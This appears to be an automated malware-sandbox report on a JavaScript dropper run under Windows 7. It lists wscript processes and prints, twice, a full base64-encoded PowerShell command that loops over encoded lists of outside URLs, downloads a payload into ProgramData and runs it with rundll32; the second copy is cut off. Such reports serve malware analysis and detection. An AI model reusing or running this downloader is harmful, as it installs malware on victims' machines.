Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | May 25, 2023, 10:43 a.m. | May 25, 2023, 10:45 a.m. |
-
wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\exocoetidae.js
1664-
wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\angiolithApodyterium.js" NodulationSophia coshersButlerage swearer tarsal
2616-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABsAGEAbgBvAGwAaQBuAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAOABBAGQAZwBCAGwAQQBIAEkAQQBkAEEAQgBvAEEASABJAEEAWgBRAEIAMwBBAEUAdwBBAFkAUQBCAGsAQQBHAGsAQQBaAGcAQgA1AEEAQwA0AEEAWgBRAEIAaABBAEgASQBBAGQAQQBCAG8AQQBBAD0APQBEAFQAcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBZAFEAQgA1AEEASABVAEEAYwB3AEIAbABBAEgATQBBAFQAQQBCAGgAQQBHAEkAQQBiAHcAQgB5AEEARwBFAEEAYgBnAEIAMABBAEMANABBAGQAQQBCAHAAQQBIAEkAQQBiAHcAQgBzAEEAQQA9AD0ARABUAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQBnAEEAdQBBAEQAWQBBAE8AUQBBAHUAQQBEAFEAQQBOAHcAQQB1AEEARABjAEEATwBBAEEAPQBEAFQAcABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGcAQQBOAGcAQQB1AEEARABFAEEATQB3AEEAeQBBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQB5AEEARABBAEEATQBnAEEAPQAiADsAJABjAHIAdQBzAHQAYQBjAGUAbwBsAG8AZwBpAHMAdAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAVQBBAE4AZwBBAHUAQQBEAEUAQQBOAEEAQQAzAEEAQwA0AEEATQBRAEEAeQBBAEQAWQBBAEwAZwBBAHgAQQBEAFkAQQBOAFEAQQA9AE4AQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBOAEEAQQB1AEEARABFAEEATgBBAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEUAQQBMAGcAQQB4AEEARABjAEEATwBRAEEAPQBOAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBFAEEAZABRAEIAcABBAEcAVQBBAGMAdwBCAGoAQQBHAFUAQQBiAGcAQgBqAEEARwBVAEEAVQBBAEIAeQBBAEcAVQBBAGMAdwBCADAAQQBHAGsAQQBaAHcAQgBwAEEARwBFAEEAZABBAEIAcABBAEcAOABBAGIAZwBBAHUAQQBHAHcAQQBiAHcAQgBoAEEARwA0AEEATgBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AdwBBAHkAQQBDADQAQQBOAEEAQQB3AEEAQwA0AEEATQBRAEEAMgBBAEQAUQBBAEwAZwBBAHgAQQBEAEEAQQBNAHcAQQA9ACIAOwAkAHMAdABvAHIAYQB4ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABZAEEATABnAEEAMQBBAEQAVQBBAEwAZwBBADAAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEAegBVAD0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATgBRAEEAdQBBAEQAawBBAE4AUQBBAHUAQQBEAEkAQQBNAFEAQQAyAEEAQwA0AEEATQBnAEEAdwBBAEQAWQBBAHoAVQA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGEAUQBCADIAQQBHAFUAQQBkAEEAQgB2AEEARwA0AEEAWgBRAEIAUwBBAEcARQBBAGIAUQBCAHoAQQBIAFEAQQBaAFEAQgBoAEEARwBRAEEATABnAEIAcwBBAEgAUQBBAFoAQQBCAGgAQQBBAD0APQB6AFUAPQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGwAQQBHADQAQQBkAEEAQgB5AEEARwBFAEEAYQBRAEIAdQBBAEMANABBAGEAUQBCAHoAQQBBAD0APQAiADsAJABPAHUAdABzAGkAZwBoAEgAYQBkAGgAcgBhAG0AYQB1AHQAaQBhAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAEEAQQBMAGcAQQA0AEEARABnAEEATABnAEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEkAQQBOAEEAQQB6AEEAQwA4AEEAVwBRAEIAcQBBAEYASQBBAEwAdwBCAEgAQQBFADgAQQBkAGcAQgA0AEEARQBVAEEAcQBzAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBNAEEAQQB1AEEARABFAEEATQB3AEEANABBAEMANABBAE8AQQBBADIAQQBDADQAQQBNAFEAQQAxAEEARABnAEEATAB3AEIAcABBAEcARQBBAEwAdwBCAEsAQQBBAD0APQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE8AQQBBAHUAQQBEAFUAQQBOAHcAQQB1AEEARABFAEEATgBRAEEAdwBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAHcAQgBNAEEASABBAEEATQBRAEIAcQBBAEgAWQBBAEwAdwBCAFQAQQBBAD0APQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBHADAAQQBNAEEAQgBHAEEARwBjAEEAUgB3AEEAMwBBAEcAcwBBAGIAZwBBAD0AcQBzAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBOAGcAQQB4AEEAQwA4AEEATwBRAEIAaABBAEQAWQBBAE4AdwBCAHcAQQBHAFUAQQBjAHcAQQB2AEEARQB3AEEAVwBBAEIAdABBAEQASQBBAE4AUQBCAFQAQQBHAEUAQQBTAEEAQgBOAEEARgBvAEEATQB3AEEAPQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAHQAQQBIAEEAQQBhAEEAQgBJAEEARQBnAEEAYwBRAEIARwBBAEUAdwBBAFEAdwBCAHIAQQBGAGcAQQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJAB0AGEAdABhAHUAcABhAEQAaQBnAGkAdABhAGwAaQBuACAAaQBuACAAJABPAHUAdABzAGkAZwBoAEgAYQBkAGgAcgBhAG0AYQB1AHQAaQBhAG4AIAAtAHMAcABsAGkAdAAgACIAcQBzAHQAZgAiACkAIAB7AHQAcgB5ACAAewAkAFMAYQBuAGcAdQBpAHMAdQBnAG8AdQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATgBnAEEAdQBBAEQARQBBAE8AUQBBADEAQQBDADQAQQBNAFEAQQAwAEEARABRAEEATABnAEEAMABBAEQAUQBBAE4AcgBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYASQBBAFoAUQBCADMAQQBHADgAQQBjAGcAQgByAEEASABNAEEATABnAEIAbgBBAEcAawBBAFoAZwBCADAAQQBIAE0AQQBOAHIAZABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGcAQQBMAGcAQQB5AEEARABJAEEATQB3AEEAdQBBAEQARQBBAE0AQQBBADAAQQBDADQAQQBPAEEAQQAyAEEAQQA9AD0ATgByAGQAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMwBBAEMANABBAE0AUQBBAHcAQQBEAEkAQQBMAGcAQQAxAEEARABJAEEATABnAEEANABBAEQATQBBACIAOwAkAHAAaABvAGwAaQBvAHQAYQBVAG4AYQBnAHIAZQBlAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHQAYQB0AGEAdQBwAGEARABpAGcAaQB0AGEAbABpAG4AKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABwAGgAbwBsAGkAbwB0AGEAVQBuAGEAZwByAGUAZQBpAG4AZwAgAC0ATwAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABnAHIAdQBuAHQAbABpAG4AZwBNAGUAdABoAGUAcgAuAGcAZQBvAG0AYQBuAHQAaQBjAFQAaAB5AHIAbwBpAGQAZQBhADsAJAB3AGgAbwBsAGUAcwBhAGwAZQBuAGUAcwBzAEkAbgB0AHUAYgBhAHQAbwByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAYwBnAEIAbABBAEgAUQBBAGMAZwBCAGgAQQBHADQAQQBjAHcAQgB0AEEARwBrAEEAZABBAEIAMABBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBZAGcAQgBsAEEASABRAEEATQBBAHYAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABJAEEATwBBAEEAdQBBAEQAWQBBAE8AQQBBAHUAQQBEAFEAQQBNAFEAQQB1AEEARABZAEEATwBRAEEAPQBNAEEAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBZAHcAQgBqAEEARwBrAEEAWgBBAEIAbABBAEcANABBAGQAQQBCAHMAQQBIAGsAQQBMAGcAQgAzAEEARwBVAEEAWgBBAEIAawBBAEcAawBBAGIAZwBCAG4AQQBBAD0APQAiADsAJABVAG4AZABlAHIAYwByAHUAcwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEANQBBAEMANABBAE0AZwBBAHcAQQBEAGcAQQBMAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQARQBBAE4AUQBBAD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAZwByAHUAbgB0AGwAaQBuAGcATQBlAHQAaABlAHIALgBnAGUAbwBtAGEAbgB0AGkAYwBUAGgAeQByAG8AaQBkAGUAYQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIAMwA2ADMAMAAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARwBjAEEAYwBnAEIAMQBBAEcANABBAGQAQQBCAHMAQQBHAGsAQQBiAGcAQgBuAEEARQAwAEEAWgBRAEIAMABBAEcAZwBBAFoAUQBCAHkAQQBDADQAQQBaAHcAQgBsAEEARwA4AEEAYgBRAEIAaABBAEcANABBAGQAQQBCAHAAQQBHAE0AQQBWAEEAQgBvAEEASABrAEEAYwBnAEIAdgBBAEcAawBBAFoAQQBCAGwAQQBHAEUAQQBMAEEAQgBpAEEARwBrAEEAYgBnAEIAawBBAEQAcwBBACIAOwAkAEwAbwB0AG0AZQBuAHQATgBlAHAAaAByAG8AZABpAG4AaQBjACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBrAEEARwBVAEEAWQBnAEIAcwBBAEcAOABBAFkAdwBCAHIAQQBFAEUAQQBiAEEAQgBwAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAFkAUQBCAHMAQQBDADQAQQBhAFEAQgB6AEEAQQA9AD0ASgBFAFQATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAGcAQQBMAGcAQQB4AEEARABNAEEATQBBAEEAdQBBAEQARQBBAE4AZwBBAHgAQQBDADQAQQBNAFEAQQA0AEEARABNAEEASgBFAFQATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAE0AQQBPAFEAQQB1AEEARABFAEEATwBRAEEANABBAEMANABBAE0AUQBBADQAQQBEAGsAQQBMAGcAQQA1AEEARABBAEEAIgA7ACQATgBvAG4AcAB1AG4AYwB0AHUAYQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABVAEEATABnAEEAeABBAEQAawBBAE4AQQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABnAEEATQBBAEEAPQAiADsAJABjAG8AdQBuAHQAZQByAHIAbwB1AG4AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBAHoAQQBDADQAQQBNAFEAQQAxAEEARABjAEEATABnAEEAeABBAEQAZwBBAE4AdwBBAHUAQQBEAFkAQQBNAEEAQQA9AHMAaQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEANABBAEQATQBBAEwAZwBBAHgAQQBEAEkAQQBNAGcAQQB1AEEARABFAEEATgBRAEEANQBBAEEAPQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"
2736
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
No hosts contacted. |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell -encodedcommand "JABsAGEAbgBvAGwAaQBuAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAOABBAGQAZwBCAGwAQQBIAEkAQQBkAEEAQgBvAEEASABJAEEAWgBRAEIAMwBBAEUAdwBBAFkAUQBCAGsAQQBHAGsAQQBaAGcAQgA1AEEAQwA0AEEAWgBRAEIAaABBAEgASQBBAGQAQQBCAG8AQQBBAD0APQBEAFQAcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBZAFEAQgA1AEEASABVAEEAYwB3AEIAbABBAEgATQBBAFQAQQBCAGgAQQBHAEkAQQBiAHcAQgB5AEEARwBFAEEAYgBnAEIAMABBAEMANABBAGQAQQBCAHAAQQBIAEkAQQBiAHcAQgBzAEEAQQA9AD0ARABUAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQBnAEEAdQBBAEQAWQBBAE8AUQBBAHUAQQBEAFEAQQBOAHcAQQB1AEEARABjAEEATwBBAEEAPQBEAFQAcABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGcAQQBOAGcAQQB1AEEARABFAEEATQB3AEEAeQBBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQB5AEEARABBAEEATQBnAEEAPQAiADsAJABjAHIAdQBzAHQAYQBjAGUAbwBsAG8AZwBpAHMAdAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAVQBBAE4AZwBBAHUAQQBEAEUAQQBOAEEAQQAzAEEAQwA0AEEATQBRAEEAeQBBAEQAWQBBAEwAZwBBAHgAQQBEAFkAQQBOAFEAQQA9AE4AQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBOAEEAQQB1AEEARABFAEEATgBBAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEUAQQBMAGcAQQB4AEEARABjAEEATwBRAEEAPQBOAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBFAEEAZABRAEIAcABBAEcAVQBBAGMAdwBCAGoAQQBHAFUAQQBiAGcAQgBqAEEARwBVAEEAVQBBAEIAeQBBAEcAVQBBAGMAdwBCADAAQQBHAGsAQQBaAHcAQgBwAEEARwBFAEEAZABBAEIAcABBAEcAOABBAGIAZwBBAHUAQQBHAHcAQQBiAHcAQgBoAEEARwA0AEEATgBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AdwBBAHkAQQBDADQAQQBOAEEAQQB3AEEAQwA0AEEATQBRAEEAMgBBAEQAUQBBAEwAZwBBAHgAQQBEAEEAQQBNAHcAQQA9ACIAOwAkAHMAdABvAHIAYQB4ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABZAEEATABnAEEAMQBBAEQAVQBBAEwAZwBBADAAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEAegBVAD0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATgBRAEEAdQBBAEQAawBBAE4AUQBBAHUAQQBEAEkAQQBNAFEAQQAyAEEAQwA0AEEATQBnAEEAdwBBAEQAWQBBAHoAVQA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGEAUQBCADIAQQBHAFUAQQBkAEEAQgB2AEEARwA0AEEAWgBRAEIAUwBBAEcARQBBAGIAUQBCAHoAQQBIAFEAQQBaAFEAQgBoAEEARwBRAEEATABnAEIAcwBBAEgAUQBBAFoAQQBCAGgAQQBBAD0APQB6AFUAPQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGwAQQBHADQAQQBkAEEAQgB5AEEARwBFAEEAYQBRAEIAdQBBAEMANABBAGEAUQBCAHoAQQBBAD0APQAiADsAJABPAHUAdABzAGkAZwBoAEgAYQBkAGgAcgBhAG0AYQB1AHQAaQBhAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAEEAQQBMAGcAQQA0AEEARABnAEEATABnAEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEkAQQBOAEEAQQB6AEEAQwA4AEEAVwBRAEIAcQBBAEYASQBBAEwAdwBCAEgAQQBFADgAQQBkAGcAQgA0AEEARQBVAEEAcQBzAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBNAEEAQQB1AEEARABFAEEATQB3AEEANABBAEMANABBAE8AQQBBADIAQQBDADQAQQBNAFEAQQAxAEEARABnAEEATAB3AEIAcABBAEcARQBBAEwAdwBCAEsAQQBBAD0APQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE8AQQBBAHUAQQBEAFUAQQBOAHcAQQB1AEEARABFAEEATgBRAEEAdwBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAHcAQgBNAEEASABBAEEATQBRAEIAcQBBAEgAWQBBAEwAdwBCAFQAQQBBAD0APQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBHADAAQQBNAEEAQgBHAEEARwBjAEEAUgB3AEEAMwBBAEcAcwBBAGIAZwBBAD0AcQBzAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBOAGcAQQB4AEEAQwA4AEEATwBRAEIAaABBAEQAWQBBAE4AdwBCAHcAQQBHAFUAQQBjAHcAQQB2AEEARQB3AEEAVwBBAEIAdABBAEQASQBBAE4AUQBCAFQAQQBHAEUAQQBTAEEAQgBOAEEARgBvAEEATQB3AEEAPQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAHQAQQBIAEEAQQBhAEEAQgBJAEEARQBnAEEAYwBRAEIARwBBAEUAdwBBAFEAdwBCAHIAQQBGAGcAQQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJAB0AGEAdABhAHUAcABhAEQAaQBnAGkAdABhAGwAaQBuACAAaQBuACAAJABPAHUAdABzAGkAZwBoAEgAYQBkAGgAcgBhAG0AYQB1AHQAaQBhAG4AIAAtAHMAcABsAGkAdAAgACIAcQBzAHQAZgAiACkAIAB7AHQAcgB5ACAAewAkAFMAYQBuAGcAdQBpAHMAdQBnAG8AdQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATgBnAEEAdQBBAEQARQBBAE8AUQBBADEAQQBDADQAQQBNAFEAQQAwAEEARABRAEEATABnAEEAMABBAEQAUQBBAE4AcgBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYASQBBAFoAUQBCADMAQQBHADgAQQBjAGcAQgByAEEASABNAEEATABnAEIAbgBBAEcAawBBAFoAZwBCADAAQQBIAE0AQQBOAHIAZABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGcAQQBMAGcAQQB5AEEARABJAEEATQB3AEEAdQBBAEQARQBBAE0AQQBBADAAQQBDADQAQQBPAEEAQQAyAEEAQQA9AD0ATgByAGQAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMwBBAEMANABBAE0AUQBBAHcAQQBEAEkAQQBMAGcAQQAxAEEARABJAEEATABnAEEANABBAEQATQBBACIAOwAkAHAAaABvAGwAaQBvAHQAYQBVAG4AYQBnAHIAZQBlAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHQAYQB0AGEAdQBwAGEARABpAGcAaQB0AGEAbABpAG4AKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABwAGgAbwBsAGkAbwB0AGEAVQBuAGEAZwByAGUAZQBpAG4AZwAgAC0ATwAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABnAHIAdQBuAHQAbABpAG4AZwBNAGUAdABoAGUAcgAuAGcAZQBvAG0AYQBuAHQAaQBjAFQAaAB5AHIAbwBpAGQAZQBhADsAJAB3AGgAbwBsAGUAcwBhAGwAZQBuAGUAcwBzAEkAbgB0AHUAYgBhAHQAbwByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAYwBnAEIAbABBAEgAUQBBAGMAZwBCAGgAQQBHADQAQQBjAHcAQgB0AEEARwBrAEEAZABBAEIAMABBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBZAGcAQgBsAEEASABRAEEATQBBAHYAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABJAEEATwBBAEEAdQBBAEQAWQBBAE8AQQBBAHUAQQBEAFEAQQBNAFEAQQB1AEEARABZAEEATwBRAEEAPQBNAEEAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBZAHcAQgBqAEEARwBrAEEAWgBBAEIAbABBAEcANABBAGQAQQBCAHMAQQBIAGsAQQBMAGcAQgAzAEEARwBVAEEAWgBBAEIAawBBAEcAawBBAGIAZwBCAG4AQQBBAD0APQAiADsAJABVAG4AZABlAHIAYwByAHUAcwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEANQBBAEMANABBAE0AZwBBAHcAQQBEAGcAQQBMAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQARQBBAE4AUQBBAD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAZwByAHUAbgB0AGwAaQBuAGcATQBlAHQAaABlAHIALgBnAGUAbwBtAGEAbgB0AGkAYwBUAGgAeQByAG8AaQBkAGUAYQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIAMwA2ADMAMAAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARwBjAEEAYwBnAEIAMQBBAEcANABBAGQAQQBCAHMAQQBHAGsAQQBiAGcAQgBuAEEARQAwAEEAWgBRAEIAMABBAEcAZwBBAFoAUQBCAHkAQQBDADQAQQBaAHcAQgBsAEEARwA4AEEAYgBRAEIAaABBAEcANABBAGQAQQBCAHAAQQBHAE0AQQBWAEEAQgBvAEEASABrAEEAYwBnAEIAdgBBAEcAawBBAFoAQQBCAGwAQQBHAEUAQQBMAEEAQgBpAEEARwBrAEEAYgBnAEIAawBBAEQAcwBBACIAOwAkAEwAbwB0AG0AZQBuAHQATgBlAHAAaAByAG8AZABpAG4AaQBjACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBrAEEARwBVAEEAWQBnAEIAcwBBAEcAOABBAFkAdwBCAHIAQQBFAEUAQQBiAEEAQgBwAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAFkAUQBCAHMAQQBDADQAQQBhAFEAQgB6AEEAQQA9AD0ASgBFAFQATgBhAEEAQgAwAEEASABRAEEAYwBBAEEA